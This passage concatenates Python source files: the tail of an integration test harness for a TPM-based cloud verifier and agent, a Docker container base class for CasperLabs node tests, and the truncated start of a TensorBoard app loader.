"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
}
def test_concurrent_cloudnodiness(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_nonce(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_quote(self):
self.execute_test_definition()
def test_cloudverifier_tenant_provide_v(self):
self.execute_test_definition()
def test_concurrent_access(self):
self.execute_test_definition()
def test_full_integration_happy_path(self):
self.execute_test_definition()
def test_persistance_file_load(self):
self.execute_test_definition()
def test_persistance_file_write(self):
self.execute_test_definition()
def test_persistance_file_bad(self):
self.execute_test_definition()
def test_persistance_file_empty(self):
self.execute_test_definition()
def test_persistance_file_nonexistent(self):
self.execute_test_definition()
def test_cloudagent_cloud_verifier_get_quote(self):
pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
time.sleep(argument)
#'{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
with open(infile) as fp:
for i, line in enumerate(fp):
if i == line_number:
return line
def sleep_for_a_while(self, argument):
time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
tmpp_policy = json_request_body['tpm_policy']
mask = 0
for key in list(tmpp_policy.keys()):
if key.isdigit() :
mask = mask + (1<<int(key))
mask_str = "0x%X"%(mask)
tmpp_policy['mask'] = mask_str
json_request_body['tpm_policy'] = tmpp_policy
cloudagent_ip = json_request_body['cloudagent_ip']
if cloudagent_ip.endswith('.txt'):
cloudagent_ip_file = cloudagent_ip
cloudagent_ip_read_from_file = self.read_line_in_file(cloudagent_ip_file, test_iteration)
json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip()
cloudagent_port = json_request_body['cloudagent_port']
if cloudagent_port.endswith('.txt'):
cloudagent_port_file = cloudagent_port
cloudagent_port_read_from_file = self.read_line_in_file(cloudagent_port_file, test_iteration)
json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip()
# parser = ConfigParser.RawConfigParser()
# parser.read(common.CONFIG_FILE)
# test_agent_uuid = parser.get('general', 'agent_uuid')
test_agent_uuid = json_request_body['agent_id']
port_string_length = len(str(json_request_body['cloudagent_port']))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(json_request_body['cloudagent_port'])
json_request_body['agent_id'] = contrived_uuid
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
#time.sleep(2)
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
#reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
try:
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 0:
self.fail("Expected empty persistence file to replace non existent persistence file on startup.")
except Exception as e:
self.fail("Problem reading persistence file after replacement of empty persistence file. Error: %s"%e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
try:
with open(cv_persistence_filename, "r") as persistance_file:
file_contents = persistance_file.read()
json_content = json.loads(file_contents)
if len(json_content) != 1 or json_content.get(uuid_str) is None:
self.fail("Unexpected persistence file contents.")
except Exception as e:
self.fail("Problem reading persistence file after POST. Error: %s"%e)
try:
with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
backup_file_contents = backup_persistance_file.read()
json_backup_content = json.loads(backup_file_contents)
if len(json_backup_content) != 0:
self.fail("Unexpected backup persistence file contents.")
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None :
self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
response_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(response_body)
public_key = jsondecoded.get("pubkey")
quote = jsondecoded.get("quote")
# test to make sure these two keys (and values) are in the return
if public_key == None or quote == None:
self.fail("Expected both pubkey and quote arguments." )
else:
mytenant = tenant.Tenant()
# command line options can overwrite config values
mytenant.cloudagent_ip = cloudagent_ip
mytenant.cloudverifier_ip = cloudverifier_ip
mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
if mytenant.validate_tpm_quote(public_key, quote):
# encrypt U with the public key
global U, K
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'encrypt_check': encrypt_check
}
u_json_message = json.dumps(data)
#post encrypted U back to Cloud Agent
response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
if response.status_code != 200:
self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
else:
self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if jsondecoded.get("pubkey") == None or jsondecoded.get("quote") == None:
self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
v = jsondecoded.get("v")
ip = jsondecoded.get("ip")
port = jsondecoded.get("port")
tpm_policy = jsondecoded.get("tpm_policy")
if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
self.fail("Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if ip is None or ip != "127.0.0.1":
self.fail("Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if port is None or port != "8882":
self.fail("Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
self.fail("Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
# call the pre_function
pre_function = test_functions.get("pre_function")
if pre_function is not None:
pre_function_name = pre_function.get('name')
pre_function_args = pre_function.get('args')
function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args) #self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
verb = test_functions.get("http_request_verb")
query = test_functions.get("http_request_query","")
test_functions.get("http_request_header")
req_header = test_functions.get("http_request_header")
response = tornado_requests.request(verb, full_url,
params=query,
data=thedata,
headers=req_header)
temp = tempfile.TemporaryFile()
for chunk in response.iter_content(1024):
temp.write(chunk)
temp.seek(0)
# copy the results for future checking
test_functions["http_result_status_actual"] = response.status_code
test_functions["http_result_header_actual"] = response.headers
test_functions["http_result_body_actual"] = temp.read()
#validate response status
if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
#validate response headers
if test_functions.get("http_result_header_expected") is not None and not (all(item in list(response.headers.items()) for item in list(test_functions["http_result_header_expected"].items()))):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
#validate (shallow) response body
if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
#validate (deep) response body
check_function = test_functions.get("check_function")
if check_function is not None:
check_argument = check_function.get("argument")
if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
# call the post_function
post_function = test_functions.get("post_function")
if post_function is not None:
post_function_name = post_function.get('name')
post_function_args = post_function.get('args')
function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
except Exception as e:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif hasattr(argument, "read"):  # file-like object; the built-in 'file' type does not exist in Python 3
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
readKUV()
#modify the persistence file per the passed argument
if argument is not None:
self.modify_persistence_file(argument)
global cv_process
cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
time.sleep(1)
return True
def overwrite_config_file(self, path, section, option, value):
parser = configparser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# write the updated configuration back to the file at 'path'
with open(path, 'w') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', str(cloudagent_start_port))
port_string_length = len(str(cloudagent_start_port))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(cloudagent_start_port)
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_start_port = cloudagent_start_port + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_port = int(cloudagent_port_read_from_file) + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
print("done creating cloud agents, waiting for them to start...")
time.sleep(10)
print("starting test...")
def kill_cloudagents_after_delay(self, argument):
sleep_time = argument.get('sleep')
time.sleep(sleep_time)
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
shutil.rmtree(new_dir)
cloudagent_start_port = cloudagent_start_port + 1
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
params = {
'agent_id': contrived_uuid,
}
try:
print(("Sending #" + str(cn) + " DELETE request to CV for uuid: " + contrived_uuid))
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + contrived_uuid + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + contrived_uuid + " failed with exception: %s"%e)
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
shutil.rmtree(new_dir)
for the_pid in cn_process_list:
print(("killing pid" + str(the_pid)))
os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
cv_process.kill()
return True
def launch_cloudagent(self, argument):
readKUV()
global cn_process
cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
time.sleep(1)
return True
def kill_cloudagent(self, argument):
cn_process.kill()
return True
def launch_required_servers(self, argument):
self.launch_cloudagent(argument)
self.launch_cloudverifier(argument)
return True
def kill_required_servers(self, argument):
self.kill_cloudagent(argument)
self.kill_cloudverifier(argument)
return True
def new_thread(self, args):
#create a new uuid, and place it in the queue
the_global_queue = args[0]
new_uuid = str(uuid.uuid4())
the_global_queue.put(new_uuid)
return threading.Thread(target=self.request_task,args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
# look up the test record
test_record = self.test_table.get(self._testMethodName)
#perform each of the test functions and store the results
change_or_validation = test_record.get(setup_or_state_change_or_validation)
if change_or_validation is not None:
for test_functions in test_record[setup_or_state_change_or_validation]:
# full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
# http_request_body_tag = test_functions.get("http_request_body")
# http_request_body_file_tag = test_functions.get("http_request_body_file")
# if http_request_body_tag != None and http_request_body_file_tag != None :
# self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
#
# thedata = ''
# if http_request_body_tag == None and http_request_body_file_tag != None:
# thedata = open(http_request_body_file_tag).read()
# else:
# thedata=http_request_body_tag
# verb = test_functions.get("http_request_verb")
# query = test_functions.get("http_request_query","")
# test_functions.get("http_request_header")
# req_header = test_functions.get("http_request_header")
concurrent_instances = None
concurrent_new_thread_function = None
concurrency_dict = test_functions.get("concurrency")
if concurrency_dict is not None:
concurrent_instances = concurrency_dict.get("instances")
concurrent_new_thread_function = concurrency_dict.get("new_thread_function")
if concurrent_instances is None or concurrent_new_thread_function is None:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers' )
for test_iteration in range(int(test_functions.get("test_iterations","1"))):
if concurrent_instances is None:
# do it inline on this thread
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration)
else:
threads = []
for count in range(concurrent_instances):
args = (queue, setup_or_state_change_or_validation, test_functions, test_iteration)
# call the new_thread_function specified in the test table under concurrency tag.
# the new_thread_function is responsible for setting up the task, and creating the new thread.
# the task given to the thread must not block and call task_done() on completion regardless of success or failure
new_thread = getattr(self, concurrent_new_thread_function)(args)
threads.append(new_thread)
#start the threads
for t in threads:
t.start()
# blocks until all tasks have called task_done()
queue.join()
#blocks until all threads are complete
for t in threads:
t.join()
def execute_test_definition(self):
test_record = self.test_table.get(self._testMethodName)
prerun_function_dict = test_record.get("prerun_function")
if prerun_function_dict is not None:
prerun_function_name = prerun_function_dict.get("name")
prerun_function_args = prerun_function_dict.get("args")
function_return = getattr(self, prerun_function_name)(prerun_function_args)
self.execute_test_function_set("setup_functions")
self.execute_test_function_set("state_change_functions")
self.execute_test_function_set("state_validation_functions")
postrun_function_dict = test_record.get("postrun_function")
if postrun_function_dict is not None:
postrun_function_name = postrun_function_dict.get("name")
postrun_function_args = postrun_function_dict.get("args")
function_return = getattr(self, postrun_function_name)(postrun_function_args)
def setUp(self):
pass
def tearDown(self):
#os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
docker_base.py
|
import json
import logging
import os
import threading
from multiprocessing import Process, Queue
from queue import Empty
from typing import Tuple, Union
from docker import DockerClient
from docker.models.containers import Container
from test.cl_node.errors import CommandTimeoutError, NonZeroExitCodeError
from test.cl_node.docker_config import DockerConfig
def humanify(line):
"""
Decode the JSON dump of the execution engine's structured log and render a human-friendly line
that, together with the prefix rendered by the Python test framework, carries all the useful
information. The original dictionary in the EE structured log looks as follows:
{'timestamp': '2019-06-08T17:51:35.308Z', 'process_id': 1, 'process_name': 'casperlabs-engine-grpc-server', 'host_name': 'execution-engine-0-mlgtn', 'log_level': 'Info', 'priority': 5, 'message_type': 'ee-structured', 'message_type_version': '1.0.0', 'message_id': '14039567985248808663', 'description': 'starting Execution Engine Server', 'properties': {'message': 'starting Execution Engine Server', 'message_template': '{message}'}}
"""
if "execution-engine-" not in line:
return line
try:
_, payload = line.split("payload=")
except Exception:
return line
d = json.loads(payload)
return " ".join(str(d[k]) for k in ("log_level", "description"))
class LoggingThread(threading.Thread):
def __init__(
self,
terminate_thread_event: threading.Event,
container: Container,
logger: logging.Logger,
) -> None:
super().__init__()
self.terminate_thread_event = terminate_thread_event
self.container = container
self.logger = logger
def run(self) -> None:
containers_log_lines_generator = self.container.logs(stream=True, follow=True)
try:
while True:
if self.terminate_thread_event.is_set():
break
line = next(containers_log_lines_generator)
s = line.decode("utf-8").rstrip()
self.logger.info(f" {self.container.name}: {humanify(s)}")
except StopIteration:
pass
class DockerBase:
"""
This holds the common base functionality for docker images.
Rather than constants, we build up properties based on values. Some only work in subclasses.
"""
DOCKER_BASE_NAME = "casperlabs"
def __init__(self, config: DockerConfig) -> None:
self.config = config
self.connected_networks = []
self.docker_tag: str = "test"
if self.is_in_docker:
self.docker_tag = os.environ.get("TAG_NAME")
self.container = self._get_container()
@property
def is_in_docker(self) -> bool:
return os.environ.get("TAG_NAME") is not None
@property
def image_name(self) -> str:
return f"{self.DOCKER_BASE_NAME}/{self.container_type}:{self.docker_tag}"
@property
def name(self) -> str:
# TODO: For compatibility only with old methods. Once name -> container_name in old methods, remove.
return self.container_name
@property
def container_name(self) -> str:
return f"{self.container_type}-{self.config.number}-{self.config.rand_str}-{self.docker_tag}"
@property
def container_type(self) -> str:
# Raising exception rather than abstract method eliminates requiring an __init__ in child classes.
raise NotImplementedError("No implementation of container_type")
@property
def host_mount_dir(self) -> str:
return f"/tmp/resources_{self.docker_tag}_{self.config.number}_{self.config.rand_str}"
@property
def bonds_file(self) -> str:
return f"{self.host_mount_dir}/bonds.txt"
@property
def host_genesis_dir(self) -> str:
return f"{self.host_mount_dir}/genesis"
@property
def host_bootstrap_dir(self) -> str:
return f"{self.host_mount_dir}/bootstrap_certificate"
@property
def host_accounts_dir(self) -> str:
return f"{self.host_mount_dir}/accounts"
@property
def docker_client(self) -> DockerClient:
return self.config.docker_client
def _get_container(self):
# Raising exception rather than abstract method eliminates requiring an __init__ in child classes.
raise NotImplementedError("No implementation of _get_container")
def stop(self):
self.container.stop()
def start(self):
self.container.start()
def __repr__(self):
return f"<{self.__class__.__name__} {self.container_name}"
def exec_run(
self, cmd: Union[Tuple[str, ...], str], stderr=True
) -> Tuple[int, str]:
queue: Queue = Queue(1)
def execution():
r = self.container.exec_run(cmd, stderr=stderr)
queue.put((r.exit_code, r.output.decode("utf-8")))
process = Process(target=execution)
logging.info("COMMAND {} {}".format(self.container_name, cmd))
process.start()
try:
exit_code, output = queue.get(True, self.config.command_timeout)
if exit_code != 0:
logging.warning(
"EXITED {} {} {}".format(self.container.name, cmd, exit_code)
)
logging.debug("OUTPUT {}".format(repr(output)))
return exit_code, output
except Empty:
process.terminate()
process.join()
raise CommandTimeoutError(cmd, self.config.command_timeout)
def shell_out(self, *cmd: str, stderr=True) -> str:
exit_code, output = self.exec_run(cmd, stderr=stderr)
if exit_code != 0:
raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output)
return output
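# Hedged usage sketch (the subclass and command are illustrative, not part of this module):
#
#   node = SomeDockerSubclass(config)        # any concrete subclass of DockerBase
#   output = node.shell_out("ls", "/tmp")    # returns the command output on exit code 0
#   # raises NonZeroExitCodeError on a non-zero exit code, and CommandTimeoutError
#   # if the command runs longer than config.command_timeout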
def network_from_name(self, network_name: str):
nets = self.docker_client.networks.list(names=[network_name])
if nets:
network = nets[0]
return network
raise Exception(f"Docker network '{network_name}' not found.")
def connect_to_network(self, network_name: str) -> None:
self.connected_networks.append(network_name)
network = self.network_from_name(network_name)
network.connect(self.container)
def disconnect_from_network(self, network_name: str) -> None:
try:
self.connected_networks.remove(network_name)
network = self.network_from_name(network_name)
network.disconnect(self.container)
except Exception as e:
logging.error(
f"Error disconnecting {self.container_name} from {network_name}: {e}"
)
def cleanup(self) -> None:
if self.container:
for network_name in self.connected_networks:
self.disconnect_from_network(network_name)
try:
self.container.remove(force=True, v=True)
except Exception as e:
logging.warning(f"Error removing container {self.container_name}: {e}")
class LoggingDockerBase(DockerBase):
"""
This adds logging to DockerBase
"""
def __init__(self, config: DockerConfig) -> None:
super().__init__(config)
self.terminate_background_logging_event = threading.Event()
self._start_logging_thread()
self._truncatedLength = 0
def _start_logging_thread(self):
self.background_logging = LoggingThread(
container=self.container,
logger=logging.getLogger("peers"),
terminate_thread_event=self.terminate_background_logging_event,
)
self.background_logging.start()
def start(self):
super().start()
if not self.background_logging.is_alive():
self._start_logging_thread()
@property
def container_type(self) -> str:
return super().container_type
def _get_container(self):
return super()._get_container()
def logs(self) -> str:
return self.container.logs().decode("utf-8")[self._truncatedLength :]
def truncate_logs(self):
self._truncatedLength = len(self.container.logs().decode("utf-8"))
def cleanup(self):
super().cleanup()
# Terminate the logging after cleaning up containers.
# Otherwise the thread may be locked waiting for another log line, rather than get
# the StopIteration exception when the container shuts down.
self.terminate_background_logging_event.set()
self.background_logging.join()
|
tensorboard_manager.py
|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
# Tensorboard 0.4.x above series
from tensorboard import default
if hasattr(default, 'PLUGIN_LOADERS'):
# Tensorflow 1.10 series
logging.debug("Tensorboard 1.10 or above series detected")
from tensorboard import program
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
argv = [
"--logdir", logdir,
"--reload_interval", str(reload_interval),
"--purge_orphaned_data", str(purge_orphaned_data),
]
tensorboard = program.TensorBoard(
default.PLUGIN_LOADERS,
default.get_assets_zip_provider())
tensorboard.configure(argv)
return application.standard_tensorboard_wsgi(
tensorboard.flags,
tensorboard.plugin_loaders,
tensorboard.assets_zip_provider)
else:
logging.debug("Tensorboard 0.4.x series detected")
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
